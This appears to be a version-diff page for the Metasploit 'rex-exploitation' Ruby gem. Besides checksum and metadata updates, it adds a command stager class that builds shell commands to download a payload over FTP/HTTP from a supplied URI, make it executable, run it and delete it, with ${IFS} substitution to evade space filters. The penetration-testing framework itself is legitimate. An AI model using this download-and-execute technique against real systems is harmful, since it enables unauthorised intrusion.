rex-exploitation 0.1.31 → 0.1.34

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 4cfc7e897b1f86f34cca1faca892489b396c010b3c7135c0954c0d6c720a8bea
4
- data.tar.gz: '0289f22adbe9e4d83b786b8518653977e57b35e6456dedd1a546ca5d8e5289bb'
3
+ metadata.gz: ea68584aaa9d9bac85899b3c9b9143c997fc21c071ca59bf4e2a3ce661c8b573
4
+ data.tar.gz: b4a0b49fc0a954a3593274a2de9662808cd0e0edcf68791ba84932e53b020ee4
5
5
  SHA512:
6
- metadata.gz: db9a31253749214b20d5a8a7bd58d16f72e540c3eb6a6291933220e7d5aad5286cc20bd4ffb6a15cf096ff6dbca49e74c492334d22a7fbaa798ba48e6eead925
7
- data.tar.gz: be2a2215875f6ab4b5cf0f1752ac1a5fb11e2d20851e231bdb3bbc2775df84289912a3f95ae36480a2e7ec21db8c5bbaae311921c0b7a6612fef60dc7cd0000e
6
+ metadata.gz: 7ac29c3b1167094d6a9103687447f00b65f6032e9d3fb7e7b3da7ff25134a87ca9532ae354bfd247f88180cb3c08deebe399cc37331c65643ca5a77b330df9e1
7
+ data.tar.gz: f38988a9ecd4b17afc30ac51d8f51ea4d490bebc42c5a3a5ab14b76c6a44eee43012bc9434cbbb88f3df44d878c2d80017e5c15d799be5a3b3e5b112e9fc31fd
checksums.yaml.gz.sig CHANGED
Binary file
@@ -0,0 +1,49 @@
1
+ # -*- coding: binary -*-
2
+
3
+ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
4
+
5
+ def http?
6
+ true
7
+ end
8
+
9
+ def user_agent
10
+ /ftp/i
11
+ end
12
+
13
+ def generate(opts = {})
14
+ if opts[:payload_uri].nil?
15
+ raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
16
+ end
17
+
18
+ opts[:temp] ||= '/tmp'
19
+ opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
+
22
+ super
23
+ end
24
+
25
+ def generate_cmds_payload(opts)
26
+ # -o: output file name (argument must be before URL)
27
+ ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
28
+ end
29
+
30
+ def generate_cmds_decoder(opts)
31
+ cmds = []
32
+
33
+ cmds << "chmod +x #{@payload_path}"
34
+ cmds << @payload_path
35
+ cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
36
+
37
+ cmds
38
+ end
39
+
40
+ def compress_commands(cmds, opts)
41
+ cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
42
+ super
43
+ end
44
+
45
+ def cmd_concat_operator
46
+ ';'
47
+ end
48
+
49
+ end
@@ -14,3 +14,4 @@ require 'rex/exploitation/cmdstager/curl'
14
14
  require 'rex/exploitation/cmdstager/fetch'
15
15
  require 'rex/exploitation/cmdstager/lwprequest'
16
16
  require 'rex/exploitation/cmdstager/psh_invokewebrequest'
17
+ require 'rex/exploitation/cmdstager/ftp_http'
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.31"
3
+ VERSION = "0.1.34"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.31
4
+ version: 0.1.34
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2022-07-01 00:00:00.000000000 Z
96
+ date: 2022-07-18 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -263,6 +263,7 @@ files:
263
263
  - lib/rex/exploitation/cmdstager/debug_write.rb
264
264
  - lib/rex/exploitation/cmdstager/echo.rb
265
265
  - lib/rex/exploitation/cmdstager/fetch.rb
266
+ - lib/rex/exploitation/cmdstager/ftp_http.rb
266
267
  - lib/rex/exploitation/cmdstager/lwprequest.rb
267
268
  - lib/rex/exploitation/cmdstager/printf.rb
268
269
  - lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
metadata.gz.sig CHANGED
Binary file